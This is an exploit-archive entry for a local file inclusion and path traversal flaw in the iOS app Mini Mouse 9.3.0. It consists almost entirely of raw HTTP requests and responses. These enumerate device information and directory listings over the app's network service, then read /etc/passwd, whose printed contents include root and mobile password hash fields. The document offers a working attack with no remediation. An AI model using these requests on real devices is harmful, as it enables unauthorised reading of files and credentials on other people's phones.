Mini Mouse 9.3.0 - Local File inclusion
Exploit Author: gosh Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Unknown Published Date: 2021-04-06
# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal
# Author: gosh
# Date: 05-04-2021
# Vendor Homepage: http://yodinfo.com
# Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948
# Version: 9.3.0
# Tested on: iPhone; iOS 14.4.2
GET /op=get_device_info HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code":1,
"ret_msg":"success",
"data":{
"uuid":"7E07125B-61BE-4F12-820C-FA706C445219",
"model":"iPhone",
"sys_name":"iOS",
"sys_version":"14.4.2",
"battery_state":0,
"battery_level":-1,
"memery_total_size":2983772160,
"device_name":"mobile",
"user_name":"iPhone",
"pwd":"",
"dir_user":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download",
"dir_doc":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents",
"dir_desktop":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop",
"sys_type":3
}
}
-------------------------------------------------------------------------------------
POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 0
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code":1,
"ret_msg":"success",
"data":{
"list":[{
"path":"//usr",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"usr",
"name_display":"usr",
"file_size":288,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//bin",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"bin",
"name_display":"bin",
"file_size":128,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//sbin",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"sbin",
"name_display":"sbin",
"file_size":544,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//.file",
"is_local":true,
"is_hide":true,
"is_floder":false,
"name":".file",
"name_display":".file",
"file_size":0,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//etc",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"etc",
"name_display":"etc",
"file_size":11,
"create_time":1577865.600000,
"update_time":1577865.600000,
"sys_type":3
}, {
"path":"//System",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"System",
"name_display":"System",
"file_size":128,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//var",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"var",
"name_display":"var",
"file_size":11,
"create_time":1577865.600000,
"update_time":1577865.600000,
"sys_type":3
}, {
"path":"//Library",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Library",
"name_display":"Library",
"file_size":672,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//private",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"private",
"name_display":"private",
"file_size":224,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//dev",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"dev",
"name_display":"dev",
"file_size":1395,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//.ba",
"is_local":true,
"is_hide":true,
"is_floder":true,
"name":".ba",
"name_display":".ba",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//.mb",
"is_local":true,
"is_hide":true,
"is_floder":true,
"name":".mb",
"name_display":".mb",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//tmp",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"tmp",
"name_display":"tmp",
"file_size":15,
"create_time":1577865.600000,
"update_time":1577865.600000,
"sys_type":3
}, {
"path":"//Applications",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Applications",
"name_display":"Applications",
"file_size":3296,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//Developer",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Developer",
"name_display":"Developer",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}, {
"path":"//cores",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"cores",
"name_display":"cores",
"file_size":64,
"create_time":0,
"update_time":0,
"sys_type":3
}]
}
}
-------------------------
using the data found:
/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download
POST /op=get_file_list HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 101
{"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"}
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code":1,
"ret_msg":"success",
"data":{
"list":[{
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"GDT",
"name_display":"GDT",
"file_size":96,
"create_time":1617228.400302,
"update_time":1617228.400302,
"sys_type":3
}, {
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg",
"is_local":true,
"is_hide":false,
"is_floder":false,
"name":"input_photo.jpg",
"name_display":"input_photo.jpg",
"file_size":6141491,
"create_time":1617583.738397,
"update_time":1617583.738402,
"sys_type":3
}, {
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Ico",
"name_display":"Ico",
"file_size":64,
"create_time":1617583.334913,
"update_time":1617583.334913,
"sys_type":3
}, {
"path":"/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download",
"is_local":true,
"is_hide":false,
"is_floder":true,
"name":"Download",
"name_display":"Download",
"file_size":64,
"create_time":1617228.371587,
"update_time":1617228.371587,
"sys_type":3
}]
}
}
----------------------------------------------------------------------
GET /file=/etc/passwd HTTP/1.1
Host: 192.168.1.104:8039
Accept: */*
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Connection: keep-alive
Accept-Encoding: gzip, deflate
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Content-Length: 4
{}
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/2018
Content-Length : 2018
##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false
_neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false
_ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
_distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false
_astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false
_ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false
_findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false
_datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false
_captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false
_analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false
_timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false
_gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false
_reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false
_diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false
_logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false
_iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false
_fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false
_knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false
_coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false